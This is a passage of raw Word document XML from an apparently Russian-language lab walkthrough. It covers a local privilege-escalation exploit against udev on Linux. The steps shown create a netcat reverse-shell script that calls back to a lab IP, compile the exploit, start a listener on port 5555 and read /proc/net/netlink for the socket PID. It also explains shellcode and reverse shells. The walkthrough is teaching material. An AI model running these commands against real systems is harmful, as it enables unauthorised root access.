      <w:r w:rsidR="00210D60" w:rsidRPr="00FB0948">
        <w:t>ксплойт скопировался в /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00210D60">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> уязвимой машины</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AA891C" w14:textId="3F65DFBD" w:rsidR="00E11D06" w:rsidRPr="00E11D06" w:rsidRDefault="00E11D06" w:rsidP="0027119B">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Создадим файл необходимый для эксплойта</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C30B5C2" w14:textId="15BD13BA" w:rsidR="0027119B" w:rsidRPr="0027119B" w:rsidRDefault="0027119B" w:rsidP="0027119B">
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>touch</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidRPr="0027119B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FEE7A5" w14:textId="54DCB4F3" w:rsidR="00E11D06" w:rsidRPr="0058112A" w:rsidRDefault="00E11D06" w:rsidP="00E11D06">
      <w:r>
        <w:t xml:space="preserve">Выполните </w:t>
      </w:r>
      <w:r w:rsidR="0027119B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:r w:rsidR="0027119B" w:rsidRPr="0058112A">
        <w:t xml:space="preserve"> скрипт для </w:t>
      </w:r>
      <w:bookmarkStart w:id="12" w:name="_Hlk34168483"/>
      <w:commentRangeStart w:id="13"/>
      <w:r w:rsidR="0027119B" w:rsidRPr="00E11D06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reverse</w:t>
      </w:r>
      <w:r w:rsidR="0027119B" w:rsidRPr="0058112A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0027119B" w:rsidRPr="00E11D06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:commentRangeEnd w:id="13"/>
      <w:r w:rsidR="006042CD">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="13"/>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidR="0027119B" w:rsidRPr="0058112A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3216A2B9" w14:textId="1FB922E8" w:rsidR="00E11D06" w:rsidRPr="00E11D06" w:rsidRDefault="00E11D06" w:rsidP="00E11D06">
      <w:pPr>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0058112A">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>Шелл-код (</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="0058112A">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> - код запуска оболочки) — это двоичный исполняемый код, который обычно передаёт управление командному процессору, например '/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r w:rsidRPr="0058112A">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058112A">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">' в </w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Unix</w:t>
      </w:r>
      <w:r w:rsidRPr="0058112A">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="0058112A">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>, '</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidRPr="0058112A">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidRPr="0058112A">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">' в </w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MS</w:t>
      </w:r>
      <w:r w:rsidRPr="0058112A">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="0058112A">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> и '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0058112A">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="0058112A">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">' в </w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidRPr="0058112A">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="0058112A">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="0058112A">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">Шелл-код может быть использован как полезная нагрузка эксплойта, обеспечивающая взломщику доступ к </w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">командной оболочке (англ. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>) в компьютерной системе. При эксплуатации удаленной уязвимости шелл-код может открывать заранее заданный порт TCP уязвимого компьютера, через который будет осуществляться дальнейший доступ к командной оболочке, такой код называется привязывающим к порту (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>binding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>Если шелл-код осуществляет подключение к порту компьютера атакующего</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">, что производится с целью обхода брандмауэра или NAT, то </w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>такой код называется обратной оболочкой</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29511F1A" w14:textId="77777777" w:rsidR="0027119B" w:rsidRPr="00E11D06" w:rsidRDefault="0027119B" w:rsidP="0027119B">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">' &gt; run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2822DE8C" w14:textId="77777777" w:rsidR="00210D60" w:rsidRPr="00E11D06" w:rsidRDefault="0027119B" w:rsidP="0027119B">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo '/b</w:t>
      </w:r>
      <w:r w:rsidR="00F75247" w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F75247" w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F75247" w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e /bin/bash 192.168.56</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F75247" w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>102</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5555' &gt;&gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC059E1" w14:textId="77777777" w:rsidR="00CA3092" w:rsidRDefault="00454629" w:rsidP="00E11D06">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454629">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="489574F9" wp14:editId="031EBB3B">
            <wp:extent cx="5760000" cy="951382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7883" b="23925"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="95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4EF58" w14:textId="4142EBE1" w:rsidR="00EC04A8" w:rsidRPr="009A4F16" w:rsidRDefault="00EC04A8" w:rsidP="00E11D06">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="219EDE4F" w14:textId="0E0E4E36" w:rsidR="00CA3092" w:rsidRPr="00EC04A8" w:rsidRDefault="00E11D06" w:rsidP="0027119B">
      <w:r>
        <w:t>38</w:t>
      </w:r>
      <w:r w:rsidR="00CA3092" w:rsidRPr="00EC04A8">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00CA3092">
        <w:t>Скомпилируем</w:t>
      </w:r>
      <w:r w:rsidR="00CA3092" w:rsidRPr="00EC04A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA3092">
        <w:t>наш</w:t>
      </w:r>
      <w:r w:rsidR="00CA3092" w:rsidRPr="00EC04A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA3092">
        <w:t>эксплойт</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C34048" w14:textId="77777777" w:rsidR="00CA3092" w:rsidRPr="00E11D06" w:rsidRDefault="00CA3092" w:rsidP="0027119B">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B860436" w14:textId="77777777" w:rsidR="00EC04A8" w:rsidRDefault="00EC04A8" w:rsidP="003160E1">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC04A8">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5072354C" wp14:editId="4E3E3F58">
            <wp:extent cx="5760000" cy="11053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5697"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="110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C87B4" w14:textId="77777777" w:rsidR="00EC04A8" w:rsidRPr="009A4F16" w:rsidRDefault="00EC04A8" w:rsidP="0027119B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BCEB012" w14:textId="3ED20EE5" w:rsidR="00EC04A8" w:rsidRDefault="00E11D06" w:rsidP="00EC04A8">
      <w:r>
        <w:t>39</w:t>
      </w:r>
      <w:r w:rsidR="00035924" w:rsidRPr="00035924">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00035924">
        <w:t>Начинаем слушать порт 5555</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73459EC4" w14:textId="77777777" w:rsidR="00035924" w:rsidRPr="00E11D06" w:rsidRDefault="00035924" w:rsidP="00035924">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lnvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5555</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E8CBB3" w14:textId="77777777" w:rsidR="00035924" w:rsidRDefault="00035924" w:rsidP="003160E1">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00035924">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1034658F" wp14:editId="0F7A0322">
            <wp:extent cx="2880000" cy="34295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1134"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2880000" cy="34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B6DAB" w14:textId="77777777" w:rsidR="00035924" w:rsidRPr="009A4F16" w:rsidRDefault="00035924" w:rsidP="00035924">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="360AF238" w14:textId="0B9B629E" w:rsidR="006D0756" w:rsidRPr="00E11D06" w:rsidRDefault="003160E1" w:rsidP="00035924">
      <w:pPr>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003160E1">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidR="006D0756" w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="006D0756" w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>Получаем</w:t>
      </w:r>
      <w:r w:rsidR="006D0756" w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PID</w:t>
      </w:r>
      <w:r w:rsidR="00E11D06" w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00E11D06" w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00E11D06" w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">дентификатор </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E11D06" w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>процесса</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E11D06" w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (process identifier))</w:t>
      </w:r>
      <w:r w:rsidR="006D0756" w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006D0756" w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>udev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006D0756" w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006D0756" w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>netlink</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006D0756" w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D0756" w:rsidRPr="00E11D06">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>сокета</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFB118E" w14:textId="40B3E7F3" w:rsidR="006D0756" w:rsidRPr="00A333D7" w:rsidRDefault="006D0756" w:rsidP="00035924">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_GoBack"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r w:rsidRPr="00A333D7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>proc</w:t>
      </w:r>
      <w:r w:rsidRPr="00A333D7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>net</w:t>
      </w:r>
      <w:r w:rsidRPr="00A333D7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E11D06">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>netlink</w:t>
      </w:r>
